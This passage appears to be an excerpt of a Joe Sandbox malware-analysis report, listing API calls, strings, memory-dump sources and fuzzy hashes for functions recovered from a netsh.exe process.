              • Instruction ID: 788ccb07acd156962dbaeff5354bcaeae15933dc2a8d6d8d9dca514bef65547b
              • Opcode Fuzzy Hash: cdcb9e9e08b727d5ee85f4fb0b149455e7d709a587ef9f63dda13b7880066d2c
              • Instruction Fuzzy Hash: D121D736910106ABDB209BA8E805AAD77BCFF08338F200625E925DF1C4D67499848BA1
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00008000), ref: 01567FCD
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01567FD4
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,00000000,00004000), ref: 01567FEC
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,00000000,00000000,00000000,?,00000000,?), ref: 01568007
                • Part of subcall function 01567920: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,0156471D,00000000,00004000,00000000,00000000,?,01567E48,?,01567F23), ref: 01567939
                • Part of subcall function 01567920: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567940
                • Part of subcall function 01567920: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 0156794A
                • Part of subcall function 01567920: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567951
                • Part of subcall function 01567920: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567969
                • Part of subcall function 01567920: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567970
                • Part of subcall function 01567920: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(000000B6,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567981
                • Part of subcall function 01567920: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567998
                • Part of subcall function 01567920: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679A8
                • Part of subcall function 01567920: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679B4
                • Part of subcall function 01567920: PrintError.NETSH(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679BC
                • Part of subcall function 01567920: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679C5
                • Part of subcall function 01567920: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679CC
                • Part of subcall function 01569CA9: __iob_func.MSVCRT ref: 01569CAE
              • fflush.MSVCRT ref: 01568026
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01568030
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01568037
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 01568045
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$AllocByteCharConsoleErrorFileMultiOutputWideWrite$CloseFormatHandleLastLoadLocalMessagePrintString__iob_funcfflush
              • String ID:
              • API String ID: 2883199061-0
              • Opcode ID: 999d4f41326284768efb5dc5347f0b962840dc179be05410e53a906d245059db
              • Instruction ID: 6b03313ce688af397fc6dd2bf70da863f8fea8f37bcc1f3af5cf249dcf5929dd
              • Opcode Fuzzy Hash: 999d4f41326284768efb5dc5347f0b962840dc179be05410e53a906d245059db
              • Instruction Fuzzy Hash: 01119AB2510209BFEB219FA5EC4EE9F7BACFB44275B110425BA099B240DA719D049BB0
              APIs
              • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,01569D60,0000000C), ref: 015694E0
              • _amsg_exit.MSVCRT ref: 015694F5
              • _initterm.MSVCRT ref: 01569549
              • __IsNonwritableInCurrentImage.LIBCMT ref: 01569575
              • exit.MSVCRT ref: 015695BC
              • _XcptFilter.MSVCRT ref: 015695CE
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
              • String ID:
              • API String ID: 796493780-0
              • Opcode ID: 19eebf60461f576fc333860d6b40ec0277d9d9551d88347bbb6283b2fd4e008e
              • Instruction ID: 899225d4c01e5d78e0e4a3c786080844c1816d0dbf92014c35a09dede62a002c
              • Opcode Fuzzy Hash: 19eebf60461f576fc333860d6b40ec0277d9d9551d88347bbb6283b2fd4e008e
              • Instruction Fuzzy Hash: E0310171680312DFDB72AF28F486A2D37A8FB44778F11002DE5218F294DB358848EBD0
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00004008), ref: 015630E5
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015630EC
              • ProcessCommand.NETSH(?,?,?,netsh), ref: 01563152
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,netsh), ref: 01563165
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156316C
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocCommandFree
              • String ID: netsh
              • API String ID: 2704014861-4166728403
              • Opcode ID: a8a454b95723ac2fb3ec1e4411dabde64b2083837fbce3bc4ef2ba87ed27d1c8
              • Instruction ID: 95a478a73b4cf52dc0e238673d3452b5f2f60e51e1d48cb7e2343544e55a7bad
              • Opcode Fuzzy Hash: a8a454b95723ac2fb3ec1e4411dabde64b2083837fbce3bc4ef2ba87ed27d1c8
              • Instruction Fuzzy Hash: 47119372A10206EBD7219F69E809E5E7BBDBB84720F1A8019E91D9F344DB70E905C7E1
              APIs
              • _wcsicmp.MSVCRT ref: 01564512
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,?,?,?,01564828), ref: 01564548
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564828), ref: 0156454F
              • memcpy.MSVCRT ref: 0156456A
              • memcpy.MSVCRT ref: 0156457F
              • memcpy.MSVCRT ref: 015645A9
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01564828), ref: 015645BD
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,01564828), ref: 015645C4
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$memcpy$Process$AllocFree_wcsicmp
              • String ID:
              • API String ID: 1032568189-0
              • Opcode ID: 07e89795480e4615d6d6480ebaf79ed301d2d349da490c329ba689c7c797b7a1
              • Instruction ID: 73c96ca5b6ea97f2b1414a9d730a4750e6b138e5366d74b0eb8565f363060db0
              • Opcode Fuzzy Hash: 07e89795480e4615d6d6480ebaf79ed301d2d349da490c329ba689c7c797b7a1
              • Instruction Fuzzy Hash: 5E31B172600A019FD7259F78DD8A92BBBFEFF90228705192DE257CBD90DA31F8108B50
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
              • Instruction ID: f646360eaba9e5a5eaff200f9fef54733caa4d5c7cf9252d3d02c8bd10cc6c4d
              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
              • Instruction Fuzzy Hash: B3024670608351AFC704DF28D490A6FBBE5EFC8704F149A2DF989AB265DB31E904CB52
              Strings
              • known by the service. It may be a more recent revision than the service is aware of., xrefs: 00D7F82C
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00DC02E7
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00DC02BD
              • RTL: Re-Waiting, xrefs: 00DC031E
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting$known by the service. It may be a more recent revision than the service is aware of.
              • API String ID: 0-797994856
              • Opcode ID: 8be28ca327fab01d6411c35ac8e63b18ca7a99bdbbc9f9349cc10a6c32b29e30
              • Instruction ID: d9b173ab1b360790daeae07c7fc90a847c15c01ae01f84d08e8bbb5ee0f54d64
              • Opcode Fuzzy Hash: 8be28ca327fab01d6411c35ac8e63b18ca7a99bdbbc9f9349cc10a6c32b29e30
              • Instruction Fuzzy Hash: EAE19F70604742DFD725CF28C885B2ABBE0FB85314F284A2DF5A9872D1E774D945CB62
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,015632C6,?,?,?,00000000,?,?), ref: 015632EC
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015632C6,?,?,?,00000000,?,?,?,01562F69,?,?), ref: 015632F3
              • memcpy.MSVCRT ref: 01563309
              • qsort.MSVCRT ref: 0156331A
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563350
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563357
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFreememcpyqsort
              • String ID:
              • API String ID: 3964738767-0
              • Opcode ID: efbd717c15f7d66bbd1f3d19781c647ac67231c2ed11da79dbf32214a9d760d8
              • Instruction ID: ac103606638e21c032c5bcf901d39ec47ae2de9519ce4bbd92bf8c6379b39896
              • Opcode Fuzzy Hash: efbd717c15f7d66bbd1f3d19781c647ac67231c2ed11da79dbf32214a9d760d8
              • Instruction Fuzzy Hash: 0F11C432600605FFCB619BA4D889E6EBBBCFF84324F10441DF60A9B610CA30A904DB70
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000002,?,?,?,?,?,015633A3,?,?,?,?,?,0156348F), ref: 015633C7
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015633A3,?,?,?,?,?,0156348F,?,00000002,00000002,?,015624DD), ref: 015633CE
              • memcpy.MSVCRT ref: 015633E4
              • qsort.MSVCRT ref: 015633F5
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563425
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156342C
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFreememcpyqsort
              • String ID:
              • API String ID: 3964738767-0
              • Opcode ID: cf841ad7414711a41826891ad3588bc78f26395693246d51f9295f579f55a0e9
              • Instruction ID: ca62a635930c6d08d52ce5335ceba623455e6ed2e2e27a81d331309dd27eb08b
              • Opcode Fuzzy Hash: cf841ad7414711a41826891ad3588bc78f26395693246d51f9295f579f55a0e9
              • Instruction Fuzzy Hash: D811A372610601ABD7615BA9EC8DA5EBBBDFB84329F111419E24B9B900DA70E840CB60
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000044,00000000,00000000,?,?,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000), ref: 01567B61
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D), ref: 01567B68
              • CreateWellKnownSid.API-MS-WIN-SECURITY-BASE-L1-1-0(0000001A,00000000,00000000,0156471D,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48), ref: 01567B7C
              • CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,00000000,000000B6,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567B8C
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567B9F
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D), ref: 01567BA6
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocCheckCreateFreeKnownMembershipTokenWell
              • String ID:
              • API String ID: 2370236486-0
              • Opcode ID: f76ebcc7d375041c0460729199a315bdcb72a38fd413a83294ffffa87a556d9f
              • Instruction ID: 0bda843dd889ec9d6121fdfd5b66ba1c7f1f7a83f1f3d4f942af51e76d93db21
              • Opcode Fuzzy Hash: f76ebcc7d375041c0460729199a315bdcb72a38fd413a83294ffffa87a556d9f
              • Instruction Fuzzy Hash: E00162B2911115BBAB219FA6EC4DDEF7E7CEF86A68B010155BA14DB104E7308904E7B0
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00008000), ref: 01567A3A
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01567A41
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,00000000,00004000), ref: 01567A59
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,00000000,00000000,00000000,?,00000000,?), ref: 01567A74
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01567A7C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01567A83
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFormatFreeLoadMessageString
              • String ID:
              • API String ID: 3754540327-0
              • Opcode ID: 00c0002602591c5abbf101d2839367a4bf7801dbb3fff6e50d1646a28390b463
              • Instruction ID: ed1a78f3b71add8646705b47f5d309f3e02abc7a181df8a45577cf9092d1c052
              • Opcode Fuzzy Hash: 00c0002602591c5abbf101d2839367a4bf7801dbb3fff6e50d1646a28390b463
              • Instruction Fuzzy Hash: 85018BB6910114BBDB218BA6EC0DEDF7EBCEB85725B010015BA19DA144D6709A04DBB0
              APIs
              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000000), ref: 01568244
              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 01568250
              • ResetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 0156825D
              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(01568060,00000000), ref: 0156826A
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 01568273
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0156827C
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: CloseConsoleHandle$CtrlCursorEventHandlerObjectPositionResetSingleWait
              • String ID:
              • API String ID: 2461670359-0
              • Opcode ID: d77d50131f437d1b85b7fd1e304526699190e130edfe67405c852cfe956869c5
              • Instruction ID: cea98ac27b5603fc8058b553246c03499a7a83216e73d9520b1d815f945063a8
              • Opcode Fuzzy Hash: d77d50131f437d1b85b7fd1e304526699190e130edfe67405c852cfe956869c5
              • Instruction Fuzzy Hash: D6F0F971510209FFCF526F61EC09E9E3B79FB48265F158524F926CE024DB718954EBA0
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-$0$0
              • API String ID: 1302938615-699404926
              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction ID: 5e41580318014abc4bd1117c30c8cbd937b9eda234108fa770ea6ed13e98a1bf
              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction Fuzzy Hash: 8F81A370E052499EDF24CEA8EA917FEBBB5AF85330F1E425BD851AB291C7349840C771
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: %%%u$[$]:%u
              • API String ID: 48624451-2819853543
              • Opcode ID: 02bef10e69b1e300b5188e6ceb71481926fbf7ab91e8876932365f389b800387
              • Instruction ID: 06b2ed22e752b3dcabf21b55a0bdc0be7b99c65619ea38c790557797879e5044
              • Opcode Fuzzy Hash: 02bef10e69b1e300b5188e6ceb71481926fbf7ab91e8876932365f389b800387
              • Instruction Fuzzy Hash: 89216076A01119ABCB10DF79CC45AFEBBF8EF54744F04012AEA05E3241EB30DA458BB1
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563695
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156369C
              • memcpy.MSVCRT ref: 015636B2
              • memcpy.MSVCRT ref: 015636D5
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015636E7
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015636EE
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Processmemcpy$AllocFree
              • String ID:
              • API String ID: 1904491526-0
              • Opcode ID: 629dcf54d7bb96cdd3185aab6d494a87dc0991d1efa55c252c083999a071ee94
              • Instruction ID: 740b876f13632074f9e41c73c81efcafa5df133c87d40d22e59be16e1b350ee3
              • Opcode Fuzzy Hash: 629dcf54d7bb96cdd3185aab6d494a87dc0991d1efa55c252c083999a071ee94
              • Instruction Fuzzy Hash: 8221F8F1A00112AFDB50DF68FC4AA5DBBACFB44674B064065E819EF244D730EE04EBA0
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015622CF
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015622D6
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015622E1
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015622E8
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015622F1
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015622F8
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: a0634e16c93fa095d5063b7a53e4e5efaf05681f1961983d7843ec8fab4bede3
              • Instruction ID: f68a93e6215ac0d263b465c88214cd36affb788d319363d16c2a0fbe1dea6ab6
              • Opcode Fuzzy Hash: a0634e16c93fa095d5063b7a53e4e5efaf05681f1961983d7843ec8fab4bede3
              • Instruction Fuzzy Hash: 80212E71710102EFDB115FA8D849B79B7B9FF89735F148454E6098F245D7309845CBA0
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,01563604), ref: 01564470
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,01563604), ref: 01564477
              • memcpy.MSVCRT ref: 0156448E
              • memcpy.MSVCRT ref: 015644B0
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,01563604), ref: 015644C0
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,01563604), ref: 015644C7
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Processmemcpy$AllocFree
              • String ID:
              • API String ID: 1904491526-0
              • Opcode ID: 67573d1544b8393692fdbc5e9c131c249c4cd694a69251b604f4b7a8c2f9e0ff
              • Instruction ID: 1abe232cdc0c969f1715b050b41854cdabd98f3534fbf6d1074dc56c4a6e9615
              • Opcode Fuzzy Hash: 67573d1544b8393692fdbc5e9c131c249c4cd694a69251b604f4b7a8c2f9e0ff
              • Instruction Fuzzy Hash: 30110432210602AFD3289B74DD9AA2BF7ADFB84221B45591DE257CF990DA70F4008B60
              APIs
              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 015680BE
              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 015680DA
              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 015680E5
              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?), ref: 01568104
              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 0156810E
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Console$BufferFillInfoOutputScreen$AttributeCharacterCursorPosition
              • String ID:
              • API String ID: 2018928815-0
              • Opcode ID: 07ec5ba2ec3482d7423706e41bef60850a6dddebeaf31b0ae2ce449541593ad0
              • Instruction ID: 95cf83122665e6cbe951570f78b75da665283298a8468b344f7e26ed865b35bc
              • Opcode Fuzzy Hash: 07ec5ba2ec3482d7423706e41bef60850a6dddebeaf31b0ae2ce449541593ad0
              • Instruction Fuzzy Hash: A0110972910129AF8F12DFA5D949DFFBBBCFB49614B01001AF911F6100D7389909EB71
              Strings
              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00DC7B7F
              • RTL: Resource at %p, xrefs: 00DC7B8E
              • RTL: Re-Waiting, xrefs: 00DC7BAC
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
               • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
               • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
